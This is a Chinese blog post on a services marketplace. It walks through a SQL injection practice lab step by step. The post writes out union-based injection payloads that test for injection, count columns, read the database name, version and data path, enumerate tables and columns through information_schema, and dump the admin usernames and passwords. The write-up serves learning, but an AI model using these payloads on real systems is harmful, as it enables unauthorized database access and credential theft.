站保站

服务市场
  • 网站市场
  • 单机游戏
  • 平台大厅
  • 转让市场
  • 发卡市场
  • 广告市场
  • 下载市场
  • 收录市场
  • 本站平台
    平台客服
    微信Q群



    平台微博/weibo    平台微信/公众号    平台抖音/快手   
    曝光台    保障    地图   
    上传资源 快速赚钱
    站保站    登录      |  注册  |  

    只需一步,快速开始!

     找回密码   |   协议
    热门搜索: 网站开发 App报毒 挖矿源码 代办资质

    封神台sql注入的靶场,为了小芳,开冲

    • 时间:2020-10-27 11:48 编辑:午喻 来源: 阅读:51
    • 扫一扫,手机访问
    摘要:

    在这里插入图片描述先判断是否存在注入 1=1 返回正常 1=2 返回错误
    所以存在SQL注入使用order by 查询该数据表的字段数量
    使用order by 查询该数据表的字段数量Order by 2 返回正常 order by 3返回错误 所以字段数量是2
    Order by 2 返回正常 order by 3返回错误 所以字段数量是2在这里插入图片描述
    判断回显的位置
    Union select 1,2在这里插入图片描述
    在 2回显 然后查询数据库名
    union select 1,database()
    得到数据库名为 maoshe在这里插入图片描述
    查询路径
    union select 1,@@datadir
    还有查询数据库版本
    Union select 1,version()
    然后查询表名
    union select 1,(select table_name from information_schema.tables where table_schema=’maoshe’ limit 0,1)在这里插入图片描述
    显示出第一个 是admin
    将limit后的挨个查询后得到 admin dir news xss
    然后在admin里查询字段名
    Union 1,(select column_name from information_schema.columns where table_schema=’maoshe’ and table_name=’admin’ limit 0,1)
    遇到一点问题一直返回不成功 然后发现网页没有将’转换成%27就一直没有返回,手动将’变成%27 解决了在这里插入图片描述
    查询到里面有 id username password
    然后查询里面的数据
    union 1,(select group_concat (id,0x7e,username,0x7e,password) from admin)
    在这里插入图片描述

    其中 0x7e是波浪线~
    然后就得到了password hellohack

    • 全部评论(0)
    • 最新

    信息加载中,请等待

    微信客服(速回)

    微信客服(慢回)



    企业微信客服二维码
    联系我们
    平台客服: 平台QQ客服

    平台电话:400电话迁移中!

    平台邮箱:28292383@qq.com

    工作时间:周一至周五:早10:00 晚:18:00

    营业执照     网站ICP备案:鲁ICP备20027607号-1     鲁公网安备:37068702000078号     增值电信业务经营许可证、在线数据与交易处理业务许可证:鲁B2-20200681      © 2016-2024 站保站  https://www.zhanbaozhan.com/ 版权所有!      平台规范:   关于我们   广告合作   隐私条款   免责声明   法律声明   服务条款   网站地图   平台工单!